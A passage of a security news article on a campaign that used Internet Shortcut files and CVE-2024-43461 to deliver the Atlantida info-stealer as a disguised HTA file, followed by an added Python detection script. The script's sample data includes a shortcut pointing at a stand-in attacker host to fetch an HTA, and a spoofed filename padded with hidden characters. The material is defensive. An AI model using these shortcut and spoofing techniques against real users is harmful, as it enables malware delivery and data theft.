“Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL,” explained Li in a July Check Point Research report.
The URLs were used to download a malicious HTA file and prompt the user to open it. Once opened, a script is executed to install the Atlantida info-stealer.
These HTA files also exploited CVE-2024-43461 to hide the HTA file extension and make it appear as a PDF when Windows asked users whether the file should be opened. The fix from Microsoft, when applied, will allow Windows to show the actual .hta extension, thereby alerting users to the malicious download.
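As an added defender-side example (not code from the article or from Check Point), the checks below triage the two artifacts described above: a Windows Internet Shortcut whose target is steered into Internet Explorer, and an HTA filename padded so that only a decoy .pdf extension is visible. The `mhtml:` prefix and the Braille-blank (U+2800) padding are taken from public analyses of CVE-2024-38112 and CVE-2024-43461, not from this article; the sample file contents and names are constructed.

```python
import configparser

# Constructed sample .url contents (INI syntax used by Windows Internet Shortcuts).
# The "mhtml:" prefix forcing the link into Internet Explorer is an assumption
# drawn from public CVE-2024-38112 write-ups, not from the article itself.
SAMPLE_URL_FILES = {
    "benign.url": "[InternetShortcut]\nURL=https://example.com/page\n",
    "suspicious.url": "[InternetShortcut]\n"
                      "URL=mhtml:http://attacker.invalid/Books.hta!x:\n"
                      "ShowCommand=7\n",
}

# Characters that render as blank space yet are not stripped by normal whitespace
# handling; U+2800 is the padding reported for CVE-2024-43461 (assumption).
HIDDEN_PAD = {"\u2800"}


def url_shortcut_flags(text):
    """Return reasons a .url file matches the IE-redirect chain described above."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    target = cp.get("InternetShortcut", "URL", fallback="")
    reasons = []
    if target.lower().startswith("mhtml:"):
        reasons.append("mhtml: handler forces Internet Explorer to open the link")
    if ".hta" in target.lower():
        reasons.append("target references an HTA file")
    return reasons


def hta_extension_spoofed(filename):
    """True if the name really ends in .hta but whitespace-like padding hides that
    extension behind a decoy one (e.g. 'Books.pdf' + 26 x U+2800 + '.hta')."""
    if not filename.lower().endswith(".hta"):
        return False
    stem = filename[:-4]
    i = len(stem)
    while i > 0 and (stem[i - 1].isspace() or stem[i - 1] in HIDDEN_PAD):
        i -= 1
    padding = len(stem) - i
    visible = stem[:i]
    # Padding plus a second, visible extension is the spoofing pattern.
    return padding > 0 and "." in visible


if __name__ == "__main__":
    for name, body in SAMPLE_URL_FILES.items():
        print(name, url_shortcut_flags(body))
    decoy = "Books_A0UJKO.pdf" + "\u2800" * 26 + ".hta"
    print(repr(decoy), hta_extension_spoofed(decoy))
```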